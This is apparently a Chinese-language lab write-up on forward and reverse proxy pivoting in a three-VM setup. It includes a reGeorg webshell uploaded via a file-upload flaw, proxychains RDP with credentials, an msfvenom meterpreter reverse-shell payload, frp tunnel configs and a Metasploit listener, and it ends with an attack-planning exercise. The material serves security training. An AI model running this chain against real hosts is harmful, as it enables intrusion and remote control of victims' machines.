代理

正向代理与反向代理

正向代理

Windows 10 主机启动web服务充当外网服务器的角色

Windows Server 2022 充当内网主机角色

kali主机充当攻击者的角色

服务器转发客户端的流量一般用于访问内网的某台主机(主机不出网)以服务器为跳板主机去访问内网主机

反向代理

内网主机不出网,没有办法直接反弹控制权限,借助失陷主机上传frps服务器让失陷web服务主机转发内网主机木马权限来控制电脑

反向代理

场景2:木马反链端口改为8888,msf监听端口改为2222

1、生成木马文件时修改连接端口号为8888

2、修改 frpc.ini 配置文件

​ local_port = 2222
​ remote_port = 8888

三台主机

window sserver 2022 vmnet1仅主机模式,不配置网关,ip为192.168.227.129/24

win10,一张nat网卡自动获取ip(192.168.142.135/24),一张vmnet1仅主机模式网卡,ip为192.168.227.100/24

kali主机,nat模式(192.168.142.145/24)

1、win7搭建pikachu或者其他文件上传靶场,Server 2022启动web服务器

windows server 2022 服务

image-20250917173322186

kali 使用 reGeorg

image-20250917110931852

选择文件上传

image-20250917111115940

上传结果

image-20250917111123138

访问测试

image-20250917111247292

修改 /etc/proxychains4.conf 文件

image-20250917172207624

启动socks服务

python2 reGeorgSocksProxy.py -p 2222 -u http://192.168.142.135/pikachu/vul/unsafeupload/uploads/tunnel.nosocket.php

python2 reGeorgSocksProxy.py -p socks端口号 -u 上传文件url

image-20250917172227389

流量转发测试

proxychains curl 192.168.227.129

image-20250917172243303

远程连接

proxychains xfreerdp3 /u:administrator /p:1234@qbz /v:192.168.227.129

image-20250917172353607

2、kali使用火狐浏览器直接访问到2022的web服务

火狐配置

image-20250917172854906

访问 Windows Server 的 web 服务

image-20250917172928296

3、kali生成木马文件,要求反连地址为真实机的1234端口,使用frp实现kali监听到木马的会话

使用kali生成木马,反连地址为真实机10.96.5.39的ip的1234端口

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.96.5.39 LPORT=1234 -f exe -o 1.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=反连服务器IP LPORT=反连端口 -f exe -o 1.exe

真实机运行frps

frps.exe -c frps.ini

image-20250917151146422

kali运行frpc

[common]
server_addr = 10.96.5.39
server_port = 7000

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 2222
remote_port = 1234

image-20250917182529628

测试

image-20250917151647786

要求木马在windows真实机运行后,kali监听127.0.0.1的2222端口可以与木马通信

msfconsole

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 2222
exploit

监听完端口,真实机启动木马exe

image-20250917183604542

关于下面场景应该如何配置frp服务

攻击者kali内网ip为 192.168.100.1

攻击者买的云服务器ip为 112.100.10.2

受害者web服务器地址为 150.1.1.1

现在攻击者因为云服务器配置过低无法安装msf,需要在kali主机监听木马文件的反连地址,请画图说明frp的配置文件如何写,kali需要做哪些操作,生成木马的命令以及msf监听器的配置

Author: wickt42
Link: http://example.com/2025/09/17/代理/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.